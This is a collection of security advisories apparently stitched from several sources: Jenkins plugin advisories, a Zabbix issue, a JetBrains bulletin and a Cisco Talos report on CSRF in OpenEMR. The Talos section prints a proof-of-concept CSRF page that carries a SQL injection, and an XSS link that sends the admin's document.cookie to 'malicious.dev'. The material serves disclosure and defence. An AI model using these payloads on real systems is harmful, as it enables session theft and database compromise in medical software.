A cross-site request forgery (CSRF) vulnerability in Jenkins OWASP Dependency-Track Plugin 3.1.0 and earlier allows attackers to connect to an attacker-specified URL, capturing credentials stored in Jenkins.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Build With Parameters Plugin
*   Cloud Statistics Plugin
*   Extra Columns Plugin
*   Jabber (XMPP) notifier and control Plugin
*   OWASP Dependency-Track Plugin
*   REST List Parameter Plugin
*   Team Foundation Server Plugin

**Descriptions****Stored XSS vulnerability in Build With Parameters Plugin**

**SECURITY-2231 / CVE-2021-21628**  
**Severity (CVSS):** High  
**Affected plugin: build-with-parameters**  
**Description:**

Build With Parameters Plugin 1.5 and earlier does not escape parameter names and descriptions.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

Build With Parameters Plugin 1.5.1 escapes parameter names and descriptions.

**CSRF vulnerability in Build With Parameters Plugin**

**SECURITY-2257 / CVE-2021-21629**  
**Severity (CVSS):** Low  
**Affected plugin: build-with-parameters**  
**Description:**

Build With Parameters Plugin 1.5 and earlier does not require POST requests for its form submission endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to build a project with attacker-specified parameters.

Build With Parameters Plugin 1.5.1 requires POST requests for the affected HTTP endpoint.

**Stored XSS vulnerability in Extra Columns Plugin**

**SECURITY-2222 / CVE-2021-21630**  
**Severity (CVSS):** High  
**Affected plugin: extra-columns**  
**Description:**

Extra Columns Plugin 1.22 and earlier does not escape parameter values in the build parameters column.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. Additionally, a view containing such a job needs to be configured with the build parameters column, or the attacker also needs View/Configure permission.

Extra Columns Plugin 1.23 escapes parameter values in the build parameters column.

**Missing permission check in Cloud Statistics Plugin**

**SECURITY-2246 / CVE-2021-21631**  
**Severity (CVSS):** Low  
**Affected plugin: cloud-stats**  
**Description:**

Cloud Statistics Plugin 0.26 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission and knowledge of random activity IDs to view related provisioning exception error messages.

Cloud Statistics Plugin 0.27 requires Overall/Administer permission to access provisioning exception error messages.

**CSRF vulnerability and missing permission checks in OWASP Dependency-Track Plugin allow capturing credentials**

**SECURITY-2250 / CVE-2021-21632 (permission check), CVE-2021-21633 (CSRF)**  
**Severity (CVSS):** Medium  
**Affected plugin: dependency-track**  
**Description:**

OWASP Dependency-Track Plugin 3.1.0 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing "Secret text" credentials stored in Jenkins. If no credentials ID is specified, the globally configured credential is used, if set up, and can likewise be captured.

Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

OWASP Dependency-Track Plugin 3.1.1 requires POST requests and appropriate permissions for the affected HTTP endpoints.

**Passwords stored in plain text by Jabber (XMPP) notifier and control Plugin**

**SECURITY-2162 / CVE-2021-21634**  
**Severity (CVSS):** Low  
**Affected plugin: jabber**  
**Description:**

Jabber (XMPP) notifier and control Plugin 1.41 and earlier stores passwords unencrypted in its global configuration file hudson.plugins.jabber.im.transport.JabberPublisher.xml on the Jenkins controller as part of its configuration.

These passwords can be viewed by users with access to the Jenkins controller file system.

Jabber (XMPP) notifier and control Plugin 1.42 stores passwords encrypted once its configuration is saved again.

**Stored XSS vulnerability in REST List Parameter Plugin**

**SECURITY-2261 / CVE-2021-21635**  
**Severity (CVSS):** High  
**Affected plugin: rest-list-parameter**  
**Description:**

REST List Parameter Plugin 1.3.0 and earlier does not escape a parameter name reference in embedded JavaScript.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

REST List Parameter Plugin 1.3.1 no longer identifies a parameter using user-specified content.

**Missing permission check in Team Foundation Server Plugin allows enumerating credentials IDs**

**SECURITY-2283 (1) / CVE-2021-21636**  
**Severity (CVSS):** Medium  
**Affected plugin: tfs**  
**Description:**

Team Foundation Server Plugin 5.157.1 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission check in Team Foundation Server Plugin allow capturing credentials**

**SECURITY-2283 (2) / CVE-2021-21637 (permission check), CVE-2021-21638 (CSRF)**  
**Severity (CVSS):** High  
**Affected plugin: tfs**  
**Description:**

Team Foundation Server Plugin 5.157.1 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this HTTP endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-2162: Low
*   SECURITY-2222: High
*   SECURITY-2231: High
*   SECURITY-2246: Low
*   SECURITY-2250: Medium
*   SECURITY-2257: Low
*   SECURITY-2261: High
*   SECURITY-2283 (1): Medium
*   SECURITY-2283 (2): High

**Affected Versions**

*   **Build With Parameters Plugin** up to and including 1.5
*   **Cloud Statistics Plugin** up to and including 0.26
*   **Extra Columns Plugin** up to and including 1.22
*   **Jabber (XMPP) notifier and control Plugin** up to and including 1.41
*   **OWASP Dependency-Track Plugin** up to and including 3.1.0
*   **REST List Parameter Plugin** up to and including 1.3.0
*   **Team Foundation Server Plugin** up to and including 5.157.1

**Fix**

*   **Build With Parameters Plugin** should be updated to version 1.5.1
*   **Cloud Statistics Plugin** should be updated to version 0.27
*   **Extra Columns Plugin** should be updated to version 1.23
*   **Jabber (XMPP) notifier and control Plugin** should be updated to version 1.42
*   **OWASP Dependency-Track Plugin** should be updated to version 3.1.1
*   **REST List Parameter Plugin** should be updated to version 1.3.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Team Foundation Server Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2162, SECURITY-2246, SECURITY-2283 (1), SECURITY-2283 (2)
*   **Justin Philip** for SECURITY-2250
*   **Kevin Guerroudj** for SECURITY-2231, SECURITY-2257, SECURITY-2261
*   **Marc Heyries** for SECURITY-2222

CVE-2021-21633: Jenkins Security Advisory 2021-03-30

In Zabbix from 4.0.x before 4.0.28rc1, 5.0.0alpha1 before 5.0.10rc1, 5.2.x before 5.2.6rc1, and 5.4.0alpha1 before 5.4.0beta2, the CControllerAuthenticationUpdate controller lacks a CSRF protection mechanism. The code inside this controller calls diableSIDValidation inside the init() method. An attacker doesn't have to know Zabbix user login credentials, but has to know the correct Zabbix URL and contact information of an existing user with sufficient privileges.

**Details**

*   **Type: **![](https://support.zabbix.com/secure/viewavatar?size=xsmall&avatarId=21772&avatarType=issuetype "Defect (Security) - Discovered security vulnerabilities in Zabbix") Defect (Security)
    
*   **Status:** Closed
    
*   **Priority: **![](https://support.zabbix.com/images/icons/priorities/major.svg "Major - Major loss of function.") Major
    
*   **Resolution:** Fixed
    
*   **Affects Version/s:** None
    

*   **Sprint:**
    
    Sprint 72 (Jan 2021)
    

**Description**

The code inside this controller calls diableSIDValidation inside the init() method. 

**Attachments**

**Issue Links**

caused by

depends on

![Defect (Security) - Discovered security vulnerabilities in Zabbix](https://support.zabbix.com/secure/viewavatar?size=xsmall&avatarId=21772&avatarType=issuetype "Defect (Security) - Discovered security vulnerabilities in Zabbix") ZBX-19150 Review all controller actions for SID validation (CVE-2021-27927)

*   ![Minor - Minor loss of function, or other problem where easy workaround is present.](https://support.zabbix.com/images/icons/priorities/minor.svg "Minor - Minor loss of function, or other problem where easy workaround is present.")
*   Closed

**Activity**

**People**

Votes:

0 Vote for this issue

Watchers:

7 Start watching this issue

**Dates**

Created:

2021 Jan 04 09:54

Updated:

2022 Jan 24 10:28

Resolved:

2021 Jan 31 18:40

CVE-2021-27927: [ZBX-18942] CControllerAuthenticationUpdate controller is not protected by a CSRF token (CVE-2021-27927)

Jenkins Claim Plugin 2.18.1 and earlier does not escape the user display name, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers who are able to control the display names of Jenkins users, either via the security realm, or directly inside Jenkins.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 24 Feb 2021 15:52:03 +0100
From: Daniel Beck <ml@...kweb.net>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities in Jenkins plugins


Jenkins is an open source automation server which enables developers around
the world to reliably build, test, and deploy their software.

The following releases contain fixes for security vulnerabilities:

\* Active Choices Plugin 2.5.3
\* Artifact Repository Parameter Plugin 1.0.1
\* Claim Plugin 2.18.2
\* Configuration Slicing Plugin 1.52
\* Repository Connector Plugin 2.0.3
\* Support Core Plugin 2.72.1


Summaries of the vulnerabilities are below. More details, severity, and
attribution can be found here:
https://www.jenkins.io/security/advisory/2021-02-24/

We provide advance notification for security updates on this mailing list:
https://groups.google.com/d/forum/jenkinsci-advisories

If you discover security vulnerabilities in Jenkins, please report them as
described here:
https://www.jenkins.io/security/#reporting-vulnerabilities

---

SECURITY-2192 / CVE-2021-21616
Active Choices Plugin 2.5.2 and earlier does not escape reference parameter
values.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Job/Configure permission.


SECURITY-2003 / CVE-2021-21617
Configuration Slicing Plugin 1.51 and earlier does not require POST
requests for the form submission endpoint reconfiguring slices, resulting
in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to apply different slice configurations
to attacker-specified jobs.


SECURITY-2183 / CVE-2021-21618
Repository Connector Plugin 2.0.2 and earlier does not escape parameter
names and descriptions for past builds.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.


SECURITY-2188 (1) / CVE-2021-21619
Claim Plugin 2.18.1 and earlier does not escape the user display name shown
in claims.

This results in a cross-site scripting (XSS) vulnerability exploitable by
attackers who are able to control the display names of Jenkins users,
either via the security realm, or directly inside Jenkins.

NOTE: Everyone with a Jenkins account can change their own display name.


SECURITY-2188 (2) / CVE-2021-21620
Claim Plugin 2.18.1 and earlier does not require POST requests for the form
submission endpoint assigning claims, resulting in a cross-site request
forgery (CSRF) vulnerability.

This vulnerability allows attackers to change claims.


SECURITY-2150 / CVE-2021-21621
Support Core Plugin 2.72 and earlier provides the serialized user
authentication as part of the "About user (basic authentication details
only)" information (\`user.md\`).

In some configurations, this can include the session ID of the user
creating the support bundle. Attackers with access to support bundle
content and the Jenkins instance could use this information to impersonate
the user who created the support bundle.


SECURITY-2168 / CVE-2021-21622
Artifact Repository Parameter Plugin 1.0.0 and earlier does not escape
parameter names and descriptions.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Job/Configure permission.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2021-21619: security - Multiple vulnerabilities in Jenkins plugins

Jenkins Active Choices Plugin 2.5.2 and earlier does not escape reference parameter values, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Active Choices Plugin
*   Artifact Repository Parameter Plugin
*   Claim Plugin
*   Configuration Slicing Plugin
*   Repository Connector Plugin
*   Support Core Plugin

**Descriptions****Stored XSS vulnerability in Active Choices Plugin**

**SECURITY-2192 / CVE-2021-21616**  
**Severity (CVSS):** High  
**Affected plugin: uno-choice**  
**Description:**

Active Choices Plugin 2.5.2 and earlier does not escape reference parameter values.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

Active Choices Plugin 2.5.3 escapes reference parameter values.

**CSRF vulnerability in Configuration Slicing Plugin**

**SECURITY-2003 / CVE-2021-21617**  
**Severity (CVSS):** Medium  
**Affected plugin: configurationslicing**  
**Description:**

Configuration Slicing Plugin 1.51 and earlier does not require POST requests for the form submission endpoint reconfiguring slices, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to apply different slice configurations to attacker-specified jobs.

Configuration Slicing Plugin 1.52 requires POST requests for the affected HTTP endpoint.

**Stored XSS vulnerability in Repository Connector Plugin**

**SECURITY-2183 / CVE-2021-21618**  
**Severity (CVSS):** High  
**Affected plugin: repository-connector**  
**Description:**

Repository Connector Plugin 2.0.2 and earlier does not escape parameter names and descriptions for past builds.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

Repository Connector Plugin 2.0.3 escapes parameter names and descriptions when creating new parameters.

**XSS vulnerability in Claim Plugin**

**SECURITY-2188 (1) / CVE-2021-21619**  
**Severity (CVSS):** High  
**Affected plugin: claim**  
**Description:**

Claim Plugin 2.18.1 and earlier does not escape the user display name shown in claims.

This results in a cross-site scripting (XSS) vulnerability exploitable by attackers who are able to control the display names of Jenkins users, either via the security realm, or directly inside Jenkins.

Everyone with a Jenkins account can change their own display name.

Claim Plugin 2.18.2 escapes the user display name shown in claims.

**CSRF vulnerability in Claim Plugin**

**SECURITY-2188 (2) / CVE-2021-21620**  
**Severity (CVSS):** High  
**Affected plugin: claim**  
**Description:**

Claim Plugin 2.18.1 and earlier does not require POST requests for the form submission endpoint assigning claims, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to change claims.

Claim Plugin 2.18.2 requires POST requests for the affected HTTP endpoint.

**Support bundles can include user session IDs in Support Core Plugin**

**SECURITY-2150 / CVE-2021-21621**  
**Severity (CVSS):** Low  
**Affected plugin: support-core**  
**Description:**

Support Core Plugin 2.72 and earlier provides the serialized user authentication as part of the "About user (basic authentication details only)" information (user.md).

In some configurations, this can include the session ID of the user creating the support bundle. Attackers with access to support bundle content and the Jenkins instance could use this information to impersonate the user who created the support bundle.

Support Core Plugin 2.72.1 no longer provides the serialized user authentication as part of the "About user (basic authentication details only)" information.

As a workaround, deselecting "About user (basic authentication details only)" before creating a support bundle will exclude the affected information from the bundle.

**Stored XSS vulnerability in Artifact Repository Parameter Plugin**

**SECURITY-2168 / CVE-2021-21622**  
**Severity (CVSS):** High  
**Affected plugin: artifact-repository-parameter**  
**Description:**

Artifact Repository Parameter Plugin 1.0.0 and earlier does not escape parameter names and descriptions.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

Artifact Repository Parameter Plugin 1.0.1 escapes parameter names and descriptions.

**Severity**

*   SECURITY-2003: Medium
*   SECURITY-2150: Low
*   SECURITY-2168: High
*   SECURITY-2183: High
*   SECURITY-2188 (1): High
*   SECURITY-2188 (2): High
*   SECURITY-2192: High

**Affected Versions**

*   **Active Choices Plugin** up to and including 2.5.2
*   **Artifact Repository Parameter Plugin** up to and including 1.0.0
*   **Claim Plugin** up to and including 2.18.1
*   **Configuration Slicing Plugin** up to and including 1.51
*   **Repository Connector Plugin** up to and including 2.0.2
*   **Support Core Plugin** up to and including 2.72

**Fix**

*   **Active Choices Plugin** should be updated to version 2.5.3
*   **Artifact Repository Parameter Plugin** should be updated to version 1.0.1
*   **Claim Plugin** should be updated to version 2.18.2
*   **Configuration Slicing Plugin** should be updated to version 1.52
*   **Repository Connector Plugin** should be updated to version 2.0.3
*   **Support Core Plugin** should be updated to version 2.72.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc. and Matt Sicker, CloudBees, Inc.** for SECURITY-2003
*   **Son Nguyen (@s0nnguy3n\_)** for SECURITY-2168, SECURITY-2183
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-2150, SECURITY-2188 (1), SECURITY-2188 (2), SECURITY-2192

CVE-2021-21616: Jenkins Security Advisory 2021-02-24

Jenkins Repository Connector Plugin 2.0.2 and earlier does not escape parameter names and descriptions for past builds, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

CVE-2021-21618: Jenkins Security Advisory 2021-02-24

CSRF protection was not present in SquaredUp before version 4.6.0. A CSRF attack could have been possible by an administrator executing arbitrary code in a HTML dashboard tile via a crafted HTML page, or by uploading a malicious SVG payload into a dashboard.

CVE-2020-9388

In JetBrains IntelliJ IDEA before 2020.3, potentially insecure deserialization of the workspace model could lead to local code execution.

JetBrains News Security

**JetBrains Security Bulletin Q4 2020**

![Robert Demmer](https://blog.jetbrains.com/wp-content/uploads/2021/03/robert-200x200.png)

In the fourth quarter of 2020, we resolved a number of security issues in our products. Here’s a summary report that contains a description of each issue and the version in which it was resolved.

**Product**

**Description**

**Severity**

**Resolved in**

**CVE/CWE**

Code With Me

An attacker in the local network knowing the session ID could get access to the encrypted traffic. Reported by Grigorii Liullin (CWM-1067)

Low

2020.3

CVE-2021-25755

Datalore

Server components versions were disclosed (DL-8327, DL-8335)

Low

Not applicable

CWE-200

Exception Analyzer

Information disclosure via the Exception Analyzer (SDP-1248)

Low

Not applicable

CWE-200

IntelliJ IDEA

HTTP links were used for several remote repositories (IDEA-228726)

Low

2020.2

CVE-2021-25756

IntelliJ IDEA

Potentially insecure deserialization of the workspace model (IDEA-253582)

Low

2020.3

CVE-2021-25758

JetBrains Account

Authorization token was sent as a query parameter within Zendesk integration (JPF-10508)

Low

2020.11

CWE-598

JetBrains Account

Open-redirect was possible (JPF-10660)

Low

2020.10

CWE-601

JetBrains Websites

Cross-origin resource sharing was possible. Reported by Ashhad Ali (SDP-1193)

Low

Not applicable

CWE-942

JetBrains Websites

Throttling was not used for a particular endpoint. Reported by Ashhad Ali (SDP-1197)

Low

Not applicable

CWE-799

JetBrains Websites

Clickjacking was possible. Reported by Ashhad Ali (SDP-1203)

Low

Not applicable

CWE-1021

Hub

Open-redirect was possible. Reported by Mohammed Amine El Attar (JPS-10348)

Medium

2020.1.12629

CVE-2021-25757

Hub

An authorized user could delete the 2FA settings of any other user (JPS-10410)

Medium

2020.1.12629

CVE-2021-25759

Hub

Information disclosure via public API (JPS-10481)

Low

2020.1.12669

CVE-2021-25760

Kotlin

A vulnerable Java API was used for creating temporary files and folders, which could make temporary files available for other users of a system. Reported by Jonathan Leitschuh (KT-42181)

Low

1.4.21

CVE-2020-29582

Ktor

Birthday attack on SessionStorage key was possible. Reported by Kenta Koyama (KTOR-878)

Low

1.5.0

CVE-2021-25761

Ktor

Weak cipher suites were enabled by default. Reported by Johannes Ulfkjær Jensen (KTOR-895)

Low

1.4.2

CVE-2021-25763

Ktor

HTTP Request Smuggling was possible. Reported by ZeddYu Lu, Kaiwen Shen, and Yaru Yang (KTOR-1116)

Low

1.4.3

CVE-2021-25762

PhpStorm

Source code could be added to debug logs (WI-54619)

Low

2020.3

CVE-2021-25764

YouTrack

CSRF via attachment upload. Reported by Yurii Sanin (JT-58157)

Medium

2020.4.4701

CVE-2021-25765

YouTrack

Users enumeration via the REST API without the appropriate permissions (JT-59396, JT-59498)

Low

2020.4.4701

CVE-2020-25208

YouTrack

Improper resource access checks (JT-59397)

Low

2020.4.4701

CVE-2021-25766

YouTrack

Issue’s existence disclosure via the YouTrack command execution (JT-59663)

Low

2020.6.1767

CVE-2021-25767

YouTrack

Improper permissions checks for attachment actions (JT-59900)

Low

2020.4.4701

CVE-2021-25768

YouTrack

Improper permissions checks for attachment actions (JT-59900)

Low

2020.4.4701

CVE-2021-25768

YouTrack

YouTrack admin wasn’t able to access attachments (JT-60824)

Low

2020.4.6808

CVE-2021-25769

YouTrack

Server-side template injection in YouTrack InCloud. Reported by Vasily Vasilkov (JT-61449)

High

2020.5.3123

CVE-2021-25770

YouTrack

Project information disclosure (JT-61566)

Low

2020.6.1099

CVE-2021-25771

Space

Potential information disclosure via logs (SPACE-9343, SPACE-10969)

Low

Not applicable

CWE-532

Space

An attacker could obtain limited information via SSRF while testing the connection to a mirrored repository (SPACE-9514)

High

Not applicable

CWE-918

Space

Content-Type header wasn’t set for some pages (SPACE-12004)

Low

Not applicable

CWE-531

Space

A REST API endpoint was available without an appropriate permissions check, which could introduce a potential DOS vector (no real exploit available). (SPACE-12288)

Low

Not applicable

CWE-732

TeamCity

Reflected XSS on several pages (TW-67424, TW-68098)

Medium

2020.2

CVE-2021-25773

TeamCity

TeamCity server DoS was possible via server integration (TW-68406, TW-68780)

Low

2020.2

CVE-2021-25772

TeamCity

ECR token exposure in the build’s parameters (TW-68515)

Medium

2020.2

CVE-2021-25776

TeamCity

A user could get access to the GitHub access token of another user (TW-68646)

Low

2020.2.1

CVE-2021-25774

TeamCity

Server admin could create and see access tokens for any other users (TW-68862)

Low

2020.2.1

CVE-2021-25775

TeamCity

Improper permissions checks during user deletion (TW-68864)

Low

2020.2.1

CVE-2021-25778

TeamCity

Improper permissions checks during tokens removal (TW-68871)

Low

2020.2.1

CVE-2021-25777

TeamCity

TeamCity Plugin SSRF. Vulnerability that could potentially expose user credentials. Reported by Jonathan Leitschuh (TW-69068)

High

2020.2.85695

CVE-2020-35667

If you need any further assistance, please contact our Security Team.

Subscribe to receive the bulletin in your mailbox.

Your JetBrains Team_  
The Drive to Develop_

CVE-2021-25758: JetBrains Security Bulletin Q4 2020 | JetBrains News

Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.

CVE-2020-28653: Read me | OpManager Help

A cross-site request forgery vulnerability exists in the GACL functionality of OpenEMR 5.0.2 and development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce). A specially crafted HTTP request can lead to the execution of arbitrary requests in the context of the victim. An attacker can send an HTTP request to trigger this vulnerability.

**Summary**

A cross-site request forgery vulnerability exists in the GACL functionality of OpenEMR 5.0.2 and development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce). A specially crafted HTTP request can lead to the execution of arbitrary requests in the context of the victim. An attacker can send an HTTP request to trigger this vulnerability.

**Tested Versions**

OpenEMR 5.0.2  
OpenEMR development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce)

**Product URLs**

https://www.open-emr.org/

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-352 - Cross-Site Request Forgery (CSRF)

**Details**

OpenEMR is an open-source medical practice management software, written in PHP, which features electronic medical records, practice management for a medical practice, scheduling and electronic billing.

OpenEMR uses phpGACL for managing a permission system for its users. As shown in TALOS-2020-1179 and TALOS-2020-1177, phpGACL is vulnerable to multiple SQL injection and XSS issues. OpenEMR ships the latest version of phpGACL, together with a small modification at the top of most of its files for adding OpenEMR authentication:

    //First make sure user has access
    require_once("../../interface/globals.php");
    
    use OpenEMR\Common\Acl\AclMain;
    
    //ensure user has proper access
    if (!AclMain::aclCheckCore('admin', 'acl')) {
                echo xlt('ACL Administration Not Authorized');
                exit;
    }
    

This makes sure that the phpGACL interface is only accessible to authorized users.

Normally, OpenEMR employs CSRF protection by using the following pattern in the pages that can be requested directly:

    use OpenEMR\Common\Csrf\CsrfUtils;
    
    if (!CsrfUtils::verifyCsrfToken($_POST["csrf_token_form"])) {
        CsrfUtils::csrfNotVerified();
    }
    

This check however is missing across all the pages defined by phpGACL, making all requests directed to the gacl/ subdirectory vulnerable to cross-site request forgery.

By exploiting this missing CSRF issue together with the vulnerabilities described in TALOS-2020-1179 and TALOS-2020-1177, an attacker could direct an OpenEMR admin to a malicious website that would be able to perform a cross-site request that exploits either a SQL injection or an XSS, leading to stealing OpenEMR administrator credentials and executing arbitrary queries in its underlaying database.

**Exploit Proof of Concept**

The following proof-of-concept assumes that an attacker sets up a server containing a page with the following contents:

    <body><pre id='out'></pre></body>
    <script>
        var http = new XMLHttpRequest();
        var url = 'http://openemr.dev/gacl/admin/edit_group.php?site=default';
        var params = 'action=Submit&parent_id=1234 union select 1,2,sleep(5)&name=1';
        http.open('POST', url, true);
        http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
        http.withCredentials = true;
        http.onreadystatechange = function() {
            if(http.readyState == 4) {
                var elem = document.getElementById('out');
                elem.innerHTML += 'done\n';
            }
        }
        http.send(params);
        var elem = document.getElementById('out');
        elem.innerHTML = 'Waiting... ';
    </script>
    

If an OpenEMR admin is directed to such page, a POST request will be executed towards the OpenEMR instance “openemr.dev”, exploiting one of the SQL injections described in TALOS-2020-1179. This is possible because no CSRF protection is implemented.

Similarly, the XSS issues described in TALOS-2020-1177 can be abused against OpenEMR. These are reproducible by having an OpenERM admin to click on a link like the following:

    http://openemr.dev/gacl/admin/acl_admin.php?action=\"><script>window.location.href="http://malicious.dev/"%2bdocument.cookie</script>
    

This would trigger a request towards “malicious.dev”, stealing the session cookie for the admin session. This exploits both the XSS issue in phpGACL, the missing CSRF check described in the current issue, and also the missing “httpOnly” flag in OpenEMR’s session cookie.

Note however, that while the session stealing would be prevented by simply setting the “httpOnly” flag, OpenEMR deliberately decided to not do so, as we can read from Common/Session/SessionUtil.php:

    <?php
    /**
     * start/destroy session/cookie for OpenEMR or OpenEMR (patient) portal
     *
     * OpenEMR session/cookie strategy:
     *  1. The vital difference between the OpenEMR and OpenEMR (patient) portal session/cookie is the
     *     cookie_httponly setting.
     *     a. For core OpenEMR, need to set cookie_httponly to false, since javascript needs to be able to
     *        access/modify the cookie to support separate logins in OpenEMR. This is important
     *        to support in OpenEMR since the application needs to robustly support access of
     *        separate patients via separate logins by same users. This is done via custom
     *        restore_session() javascript function; session IDs are effectively saved in the
     *        top level browser window.
     *     b. For (patient) portal OpenEMR, setting cookie_httponly to true. Since only one patient will
     *        be logging into the patient portal, can set this to true, which will help to prevent XSS
     *        vulnerabilities.
    

**Timeline**

2020-10-23 - Vendor Disclosure  
2021-01-05 - Vendor Patched  
2021-01-27 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

Tag

#csrf